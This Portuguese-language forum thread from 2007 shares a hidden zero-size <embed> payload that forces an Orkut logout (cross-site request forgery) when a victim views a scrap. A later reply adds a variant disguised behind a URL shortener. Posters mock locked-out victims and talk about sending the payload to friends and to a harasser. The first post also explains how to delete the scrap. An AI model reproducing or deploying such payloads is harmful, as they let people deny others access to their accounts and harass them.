morgado4ever 2 Postado Dezembro 16, 2007 Share Postado Dezembro 16, 2007 Desculpa pessoal mas vo acabar com a sharada de vcs! <embed src="http://www.orkut.com/GLogin.aspx?cmd=logout" width="0" height="0"></embed> width="0" height="0" (Nao vai ficar um quadrado em branco estilo uma foto. <embed src="http://www.orkut.com/GLogin.aspx?cmd=logout" width="0" height="0"></embed> Codigo normal, mais recomendado. Esplicando como apagar esse recado e poder desfrutar do orkut trankilamente. Abra uma janela, de login, va a pagina de recados. Abra outra janela, de login, va ate seu perfil, volte na janela anterior na pagina de recados e apague o recado, simples não? o Embled é um comando que faz como se vc tivesse entrado em uma certa pagina apenas uma vez. Por isso conseguimos apaga-lo tranquilamente. Porem a um codigo que executa o embled a cada 1 seg, ai ja era o orkut! ^^ Link para o comentário Compartilhar em outros sites More sharing options...
Powerzin 20 Postado Dezembro 16, 2007 Share Postado Dezembro 16, 2007 HAUShaushsuahsuahusha po era legal os cara xorando sem poder entrar no scrapbook hauiH Abraços, Link para o comentário Compartilhar em outros sites More sharing options...
Marok 7 Postado Dezembro 16, 2007 Share Postado Dezembro 16, 2007 Nem envia o recado. LOL. Link para o comentário Compartilhar em outros sites More sharing options...
Northon 3 Postado Dezembro 17, 2007 Share Postado Dezembro 17, 2007 (editado) Deu Certo Eu Fui Testar Em Min Ai Funcionou =D Valeu! Editado Dezembro 17, 2007 por Northon Link para o comentário Compartilhar em outros sites More sharing options...
Lordfire 309 Postado Dezembro 17, 2007 Share Postado Dezembro 17, 2007 Ahn? É pra desbugar ou f**** com o orkut dos outros? E o que faz isso? Link para o comentário Compartilhar em outros sites More sharing options...
gabiruskt 0 Postado Dezembro 17, 2007 Share Postado Dezembro 17, 2007 Que eu saiba não funciona mais. Outra coisa, se você tiver o power scrap, ou qualquer programa que delete scrap, não precisa fazer nada disso. Link para o comentário Compartilhar em outros sites More sharing options...
Powerzin 20 Postado Dezembro 17, 2007 Share Postado Dezembro 17, 2007 Que eu saiba não funciona mais.Outra coisa, se você tiver o power scrap, ou qualquer programa que delete scrap, não precisa fazer nada disso. Hmm Não Seja Por isso tenho o codigo do Powerscrap <embed src="http://xrl.us/sairorkut" wmode="transparent" width="0" height="0"></embed> Link para o comentário Compartilhar em outros sites More sharing options...
B XXX 0 Postado Dezembro 28, 2007 Share Postado Dezembro 28, 2007 aff isso eh ###### ja mandaram pra min, tem um kra q eu excluo e ele manda pra min denovo, tem como eu tipo bloquiar pra n aceitar esses tipos de msg pra ele n me mandar + ou se nao alguma coisa q eu mande pra ele pra lacar o orkut dele e ele n ter como + me enviar xD Link para o comentário Compartilhar em outros sites More sharing options...
tibiaa4e 86 Postado Dezembro 29, 2007 Share Postado Dezembro 29, 2007 So da para mandar para amigo esse tipo de recado xD odeio power scrap Por isso todos meus amigos q tiver irão receber um arquivo do mal =D Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados